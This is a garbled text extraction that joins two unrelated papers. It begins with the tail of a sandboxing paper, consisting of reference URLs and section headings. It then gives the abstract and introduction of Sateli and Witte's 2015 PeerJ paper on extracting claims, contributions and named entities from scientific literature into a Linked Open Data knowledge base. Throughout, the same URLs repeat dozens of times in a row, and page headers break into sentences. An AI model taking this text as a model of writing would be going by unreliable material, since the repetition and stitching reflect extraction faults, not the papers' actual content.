http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534798 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://dl.acm.org/citation.cfm?id=2534766.2534796 http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf http://dx.doi.org/10.7717/peerj-cs.43 A systematic analysis of the science of sandboxing Introduction What is a Sandbox? Methodology Picking papers Categorizing the dataset Analyzing the dataset Results Sandboxes: building materials for secure systems Policy flexibility as a usability bellwether The state of practice in sandbox validation Strengthening Sandboxing Results Structured arguments Sandbox and policy usability Enabling Meta-analysis Generalizability of methodology Meta-analysis challenges and suggested solutions Threats to Validity Conclusion References work_dzfda62vxjemvos4a6kit6z3iu ---- Semantic representation of scientific literature: bringing claims, contributions and named entities onto the Linked Open Data cloud Submitted 4 August 2015 Accepted 13 November 2015 Published 9 December 2015 Corresponding authors Bahar Sateli, sateli@semanticsoftware.info René Witte, witte@semanticsoftware.info Academic editor Tamara Sumner Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.37 Copyright 2015 Sateli and Witte Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Semantic representation of scientific literature: bringing claims, contributions and named entities onto the Linked Open Data cloud Bahar Sateli and René Witte Semantic Software Lab, Department of Computer Science and Software Engineering, Concordia University, Montréal, Québec, Canada ABSTRACT Motivation. Finding relevant scientific literature is one of the essential tasks re- searchers are facing on a daily basis. Digital libraries and web information retrieval techniques provide rapid access to a vast amount of scientific literature. However, no further automated support is available that would enable fine-grained access to the knowledge ‘stored’ in these documents. The emerging domain of Semantic Publish- ing aims at making scientific knowledge accessible to both humans and machines, by adding semantic annotations to content, such as a publication’s contributions, methods, or application domains. However, despite the promises of better knowledge access, the manual annotation of existing research literature is prohibitively expen- sive for wide-spread adoption. We argue that a novel combination of three distinct methods can significantly advance this vision in a fully-automated way: (i) Natural Language Processing (NLP) for Rhetorical Entity (RE) detection; (ii) Named Entity (NE) recognition based on the Linked Open Data (LOD) cloud; and (iii) automatic knowledge base construction for both NEs and REs using semantic web ontologies that interconnect entities in documents with the machine-readable LOD cloud. Results. We present a complete workflow to transform scientific literature into a semantic knowledge base, based on the W3C standards RDF and RDFS. A text min- ing pipeline, implemented based on the GATE framework, automatically extracts rhetorical entities of type Claims and Contributions from full-text scientific literature. These REs are further enriched with named entities, represented as URIs to the linked open data cloud, by integrating the DBpedia Spotlight tool into our workflow. Text mining results are stored in a knowledge base through a flexible export process that provides for a dynamic mapping of semantic annotations to LOD vocabularies through rules stored in the knowledge base. We created a gold standard corpus from computer science conference proceedings and journal articles, where Claim and Contribution sentences are manually annotated with their respective types using LOD URIs. The performance of the RE detection phase is evaluated against this corpus, where it achieves an average F-measure of 0.73. We further demonstrate a number of semantic queries that show how the generated knowledge base can provide support for numerous use cases in managing scientific literature. Availability. All software presented in this paper is available under open source licenses at http://www.semanticsoftware.info/semantic-scientific-literature-peerj- 2015-supplements. Development releases of individual components are additionally available on our GitHub page at https://github.com/SemanticSoftwareLab. How to cite this article Sateli and Witte (2015), Semantic representation of scientific literature: bringing claims, contributions and named entities onto the Linked Open Data cloud. PeerJ Comput. Sci. 1:e37; DOI 10.7717/peerj-cs.37 mailto:sateli@semanticsoftware.info mailto:witte@semanticsoftware.info https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.37 http://dx.doi.org/10.7717/peerj-cs.37 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab https://github.com/SemanticSoftwareLab http://dx.doi.org/10.7717/peerj-cs.37 Subjects Artificial Intelligence, Digital Libraries, Natural Language and Speech Keywords Natural language processing, Semantic web, Semantic publishing INTRODUCTION In a commentary for the Nature journal, Berners-Lee & Hendler (2001) predicted that the new semantic web technologies “may change the way scientific knowledge is produced and shared.” They envisioned the concept of “machine-understandable documents,” where machine-readable metadata is added to articles in order to explicitly mark up the data, experiments and rhetorical elements in their raw text. More than a decade later, not only is the wealth of existing publications still without annotations, but nearly all new research papers still lack semantic metadata as well. Manual efforts for adding machine-readable metadata to existing publications are simply too costly for wide-spread adoption. Hence, we investigate what kind of semantic markup can be automatically generated for research publications, in order to realize some of the envisioned benefits of semantically annotated research literature. As part of this work, we first need to identify semantic markup that can actually help to improve specific tasks for the scientific community. A survey by Naak, Hage & Aimeur (2008) revealed that when locating papers, researchers consider two factors when assessing the relevance of a document to their information need, namely, the content and quality of the paper. They argue that a single rating value cannot represent the overall quality of a given research paper, since such a criteria can be relative to the objective of the researcher. For example, a researcher who is looking for implementation details of a specific approach is interested mostly in the Implementation section of an article and will give a higher ranking to documents with detailed technical information, rather than related documents with modest implementation details and more theoretical contributions. Therefore, a lower ranking score does not necessarily mean that the document has an overall lower (scientific) quality, but rather that its content does not satisfy the user’s current information need. Consequently, to support users in their concrete tasks involving scientific literature, we need to go beyond standard information retrieval methods, such as keyword-based search, by taking a user’s current information need into account. Our vision (Fig. 1) is to offer support for semantically rich queries that users can ask from a knowledge base of scientific literature, including specific questions about the contributions of a publication or the discussion of specific entities, like an algorithm. For example, a user might want to ask the question “Show me all full papers from the SePublica workshops, which contain a contribution involving ‘linked data.”’ We argue that this can be achieved with a novel combination of three approaches: Natural Language Processing (NLP), Linked Open Data (LOD)-based entity detection, and semantic vocabularies for automated knowledge base construction (we discuss these methods in our ‘Background’ section below). By applying NLP techniques for rhetorical entity (RE) recognition to scientific documents, we can detect which text fragments form Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 2/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 Figure 1 This diagram shows our visionary workflow to extract the knowledge contained in scientific literature by means of natural language processing (NLP), so that researchers can interact with a semantic knowledge base instead of isolated documents. a rhetorical entity, like a contribution or claim. By themselves, these REs provide support for use cases such as summarization (Teufel & Moens, 2002), but cannot answer what precisely a contribution is about. We hypothesize that the named entities (NEs) present in a document (e.g., algorithms, methods, technologies) can help locate relevant publications for a user’s task. However, manually curating and updating all these possible entities for an automated NLP detection system is not a scalable solution either. Instead, we aim to leverage the Linked Open Data cloud (Heath & Bizer, 2011), which already provides a continually updated source of a wealth of knowledge across nearly every domain, with explicit and machine-readable semantics. If we can link entities detected in research papers to LOD URIs (Universal Resource Identifiers), we can semantically query a knowledge base for all papers on a specific topic (i.e., a URI), even when that topic is not mentioned literally in a text: for example, we could find a paper for the topic “linked data,” even when it only mentions “linked open data,” or even “LOD,” since they are semantically related in the DB- pedia ontology (DBpedia Ontology, http://wiki.dbpedia.org/services-resources/ontology). But linked NEs alone again do not help in precisely identifying literature for a specific task: Did the paper actually make a new contribution about “linked data,” or just mention it as an application example? Our idea is that by combining the REs with the LOD NEs, we can answer questions like these in a more precise fashion than either technique alone. To test these hypotheses, we developed a fully-automated approach that transforms publications and their NLP analysis results into a knowledge base in RDF (Resource De- scription Framework, http://www.w3.org/RDF) format, based on a shared vocabulary, so that they can take part in semantically rich queries and ontology-based reasoning. We eval- uate the performance of this approach on several volumes of computer science conference and workshop proceedings and journal articles. Note that all queries and results shown in this paper can be verified by visiting the paper’s supplementary material webpage at http:// www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 3/27 https://peerj.com/computer-science/ http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.w3.org/RDF http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements 